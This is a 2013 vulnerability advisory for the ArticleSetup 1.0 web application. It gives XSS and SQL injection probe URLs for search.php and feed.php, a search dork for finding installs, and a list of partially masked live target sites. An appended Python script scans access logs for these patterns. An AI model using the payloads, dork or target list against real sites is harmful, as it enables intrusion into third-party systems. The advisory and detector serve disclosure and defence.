ArticleSetup Multiple Vulnerabilities

2013.09.30
Credit: DevilScreaM
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79, CWE-89

#Exploit Title : ArticleSetup Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 21/09/2013
#Category : Web Applications
#Vendor : http://www.articlesetup.com/
#Version : 1.0
#Dork intext:Powered By Article Marketing
#Vulnerability : Cross Site Scripting , SQL Injection
#Tested On : Windows 7, Ubuntu (Mozilla & Chrome)
#Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker

Cross Site Scripting

http://site-target/search.php?s=[XSS]

Example

http://www.freearticle.com.au/search.php?s=<script>alert('DevilScreaM')</script>

#XSS at Page Admin

http://site-target/admin/search.php?s=<script>alert('DevilScreaM')</script>

===================================================================================

SQL Injection Vulnerability

http://site-target/feed.php?cat=[SQL Injection]
http://site-target/search.php?s=[SQL Injection]

Example

http://www.frX.au/feed.php?cat=100'
http://www.frX.com.au/search.php?s=123'

====================================================================================

Example Target

http://freeaXom.au/feed.php?cat=100'
http://alfitXXX99.net/artikel/feed.php?cat=2'
http://demoXXftaculous.com/ArticleSetup/feed.php?cat=100'
http://oromXXtionary.com/articles/feed.php?cat=1'
http://beinXhoppers.com/article/feed.php?cat=44'
http://acXon.eu/article/feed.php?cat=54'
http://sitevXna.com/feed.php?cat=12'
http://www.artiXshub.in/feed.php?cat=10'
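
For operators of an ArticleSetup install, the request patterns above can be searched for in web server access logs. The following is an added example, not part of the original advisory: it assumes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return the findings for one request URL (empty list if nothing matched)."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes values
    script = parts.path.rsplit("/", 1)[-1]
    findings = []
    if script == "feed.php":
        for value in params.get("cat", []):
            # The advisory's cat values are numeric ids; anything else is suspect.
            if not re.fullmatch(r"[0-9]+", value):
                findings.append("feed.php cat is not a plain integer")
    if script == "search.php":
        where = "admin search" if parts.path.endswith("/admin/search.php") else "search"
        for value in params.get("s", []):
            if re.search(r"[<>]", value):
                findings.append(f"{where} s contains markup characters")
            # Quotes also occur in honest searches: a triage signal, not a verdict.
            if "'" in value or '"' in value:
                findings.append(f"{where} s contains a quote character")
    return findings

def scan(log_lines):
    """Yield (line_number, url, findings) for every flagged log line."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            findings = classify(match.group(1))
            if findings:
                yield number, match.group(1), findings

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Sep/2013:10:00:01 +0000] "GET /feed.php?cat=100 HTTP/1.1" 200 512',
    '203.0.113.9 - - [21/Sep/2013:10:00:07 +0000] "GET /feed.php?cat=100%27 HTTP/1.1" 500 0',
    '203.0.113.5 - - [21/Sep/2013:10:00:09 +0000] "GET /search.php?s=marketing+tips HTTP/1.1" 200 900',
    '203.0.113.9 - - [21/Sep/2013:10:00:12 +0000] "GET /search.php?s=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 870',
    '203.0.113.9 - - [21/Sep/2013:10:00:15 +0000] "GET /admin/search.php?s=123%27 HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for number, url, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {url} -> {'; '.join(findings)}")
```

Hits on `feed.php` are the higher-confidence signal, since a category id has no legitimate reason to be non-numeric; the same integer check is the natural server-side validation for that parameter.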



Copyright 2024, cxsecurity.com

 
